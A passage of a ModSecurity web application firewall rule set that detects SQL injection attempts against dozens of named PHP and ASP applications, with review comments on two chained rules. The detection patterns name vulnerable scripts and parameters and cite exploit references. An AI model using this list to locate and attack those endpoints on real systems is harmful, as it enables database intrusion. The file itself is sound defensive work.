Panel (AIOCP) SQL Injection Attempt -- cp_downloads.php did UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004534) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AJ Auction SQL Injection Attempt -- subcat.php cate_id UPDATE SecRule REQUEST_LINE "@contains /subcat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004534,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AJ Auction SQL Injection Attempt -- subcat.php cate_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3408'" SecRule &TX:'/SQL_INJECTION.*ARGS:cate_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AJ Auction SQL Injection Attempt -- subcat.php cate_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004540) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AJDating SQL Injection Attempt -- view_profile.php user_id UPDATE SecRule REQUEST_LINE "@contains /view_profile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004540,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AJDating SQL Injection Attempt -- view_profile.php user_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3409'" SecRule &TX:'/SQL_INJECTION.*ARGS:user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AJDating SQL Injection Attempt -- view_profile.php user_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004546) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AJ Classifieds SQL Injection Attempt -- postingdetails.php postingid UPDATE SecRule REQUEST_LINE "@contains 
/postingdetails.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004546,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AJ Classifieds SQL Injection Attempt -- postingdetails.php postingid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3410'" SecRule &TX:'/SQL_INJECTION.*ARGS:postingid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AJ Classifieds SQL Injection Attempt -- postingdetails.php postingid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004551) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AJ Forum SQL Injection Attempt -- topic_title.php td_id UPDATE SecRule REQUEST_LINE "@contains /topic_title.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004551,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AJ Forum SQL Injection Attempt -- topic_title.php td_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3411'" SecRule &TX:'/SQL_INJECTION.*ARGS:td_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AJ Forum SQL Injection Attempt -- topic_title.php td_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006824) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum2.asp soruid UPDATE SecRule REQUEST_LINE "@contains /forum2.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006824,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum2.asp soruid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:soruid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum2.asp soruid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006830) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp ak UPDATE SecRule REQUEST_LINE "@contains /kullanicilistesi.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006830,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp ak UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:ak/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp ak UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006836) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- aramayap.asp kelimeler UPDATE SecRule REQUEST_LINE "@contains /aramayap.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006836,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- aramayap.asp kelimeler UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:kelimeler/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- aramayap.asp kelimeler UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006842) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- giris.asp kullaniciadi UPDATE SecRule REQUEST_LINE "@contains /giris.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006842,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- giris.asp kullaniciadi UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:kullaniciadi/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- giris.asp kullaniciadi UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006848) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- mesajkutum.asp mesajno UPDATE SecRule REQUEST_LINE "@contains /mesajkutum.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006848,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- mesajkutum.asp mesajno UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:mesajno/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- mesajkutum.asp mesajno UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006854) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp harf UPDATE SecRule REQUEST_LINE "@contains /kullanicilistesi.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006854,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp harf UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:harf/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp harf UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006860) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum.asp baslik UPDATE SecRule REQUEST_LINE "@contains /forum.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006860,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum.asp baslik UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:baslik/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum.asp baslik UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005110) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- artreplydelete.asp username UPDATE SecRule REQUEST_LINE "@contains /artreplydelete.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005110,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- artreplydelete.asp username UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0341'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- artreplydelete.asp username UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP NEWS SQL Injection Attempt -- news_detail.asp id UPDATE SecRule REQUEST_LINE "@contains /news_detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005169,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP NEWS SQL Injection Attempt -- news_detail.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3187'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP NEWS SQL Injection Attempt -- news_detail.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005175) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- user.asp user UPDATE SecRule REQUEST_LINE "@contains /user.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005175,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- user.asp user UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3186'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- user.asp user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005888) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP SiteWare autoDealer SQL Injection Attempt -- detail.asp 
iPro UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005888,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP SiteWare autoDealer SQL Injection Attempt -- detail.asp iPro UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3062'" SecRule &TX:'/SQL_INJECTION.*ARGS:iPro/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP SiteWare autoDealer SQL Injection Attempt -- detail.asp iPro UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007005) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP ListPics SQL Injection Attempt -- listpics.asp ID UPDATE SecRule REQUEST_LINE "@contains /listpics.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007005,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP ListPics SQL Injection Attempt -- listpics.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21279'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP ListPics SQL Injection Attempt -- listpics.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004324) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Absolute Image Gallery SQL Injection Attempt -- gallery.asp categoryid UPDATE SecRule REQUEST_LINE "@contains /gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004324,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Absolute Image Gallery SQL Injection Attempt -- gallery.asp categoryid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22988'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:categoryid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Absolute Image Gallery SQL Injection Attempt -- gallery.asp categoryid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007397) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- product.asp productid UPDATE SecRule REQUEST_LINE "@contains /product.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007397,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- product.asp productid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21166'" SecRule &TX:'/SQL_INJECTION.*ARGS:productid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- product.asp productid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007403) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- search.asp search UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007403,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- search.asp search UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21166'" SecRule &TX:'/SQL_INJECTION.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- search.asp search UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010135) 
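# SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Achievo userid= Variable UPDATE SET SQL Injection Attempt
#
# Rule 2010135 (tagged cve,2009-2734) is a five-rule chain; every link must
# match before the final setvar actions run:
#   1. a parameter name containing "userid" (case-insensitive, unanchored);
#   2. the request line containing the dispatch.php path with
#      atknodetype=reports.weekreport directly after the "?";
#   3-4. cheap literal pre-filters for the two SQL keywords;
#   5. the case-insensitive regex that requires UPDATE followed by SET.
# Fix: links 3 and 4 used case-sensitive "@contains UPDATE" / "@contains SET"
# with no lowercase transformation, so they stopped the chain for input that
# link 5 would have matched. They now append t:lowercase and compare against
# lowercase literals, which still matches everything the originals matched
# and brings the pre-filters in line with link 5.
# NOTE(review): link 2 only matches when atknodetype is the first query
# parameter; matching REQUEST_FILENAME and ARGS:atknodetype separately would
# not depend on parameter order.
# NOTE(review): links 2-5 declare no decoding transformations of their own;
# transformations are presumably set per rule within a chain, so the
# starter's list would not cover them -- confirm against the deployed
# ModSecurity version.
SecRule ARGS_NAMES "(?i:userid)" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010135,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Achievo userid= Variable UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'cve,2009-2734'"
    SecRule REQUEST_LINE "@contains /dispatch.php?atknodetype=reports.weekreport" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "@contains update" "chain,t:lowercase"
    SecRule QUERY_STRING|REQUEST_BODY "@contains set" "chain,t:lowercase"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Achievo userid= Variable UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007481) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_view.asp articleID UPDATE
# Two-rule chain: the starter matches the request line against the literal
# path (case-sensitive, no t:lowercase); the chained rule fires when at least
# one TX variable name matches the regex. The TX entries are presumably set
# by generic SQL injection rules evaluated earlier -- confirm load order.
SecRule REQUEST_LINE "@contains /activenews_view.asp" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007481,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_view.asp articleID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:articleID/' "@gt 0" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_view.asp articleID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007486) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- default.asp page UPDATE
# Split by the listing: the operator and actions of the next SecRule are on the following line.
SecRule REQUEST_LINE 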
"@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007486,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- default.asp page UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'" SecRule &TX:'/SQL_INJECTION.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- default.asp page UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007492) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_categories.asp catID UPDATE SecRule REQUEST_LINE "@contains /activeNews_categories.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007492,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_categories.asp catID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'" SecRule &TX:'/SQL_INJECTION.*ARGS:catID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_categories.asp catID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007498) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_comments.asp articleID UPDATE SecRule REQUEST_LINE "@contains /activeNews_comments.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007498,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_comments.asp articleID 
UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'" SecRule &TX:'/SQL_INJECTION.*ARGS:articleID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_comments.asp articleID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007565) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_search.asp query UPDATE SecRule REQUEST_LINE "@contains /activenews_search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007565,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_search.asp query UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'" SecRule &TX:'/SQL_INJECTION.*ARGS:query/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_search.asp query UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004892) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- HaberDetay.asp id UPDATE SecRule REQUEST_LINE "@contains /HaberDetay.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004892,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- HaberDetay.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0620'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- HaberDetay.asp id 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- rss.asp kid UPDATE SecRule REQUEST_LINE "@contains /rss.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004898,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- rss.asp kid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0620'" SecRule &TX:'/SQL_INJECTION.*ARGS:kid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- rss.asp kid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005777) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS @lex Guestbook SQL Injection Attempt -- index.php lang UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005777,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS @lex Guestbook SQL Injection Attempt -- index.php lang UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3103'" SecRule &TX:'/SQL_INJECTION.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS @lex Guestbook SQL Injection Attempt -- index.php lang UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AlstraSoft E-Friends SQL Injection Attempt -- index.php pack UPDATE SecRule REQUEST_LINE "@contains /index.php" 
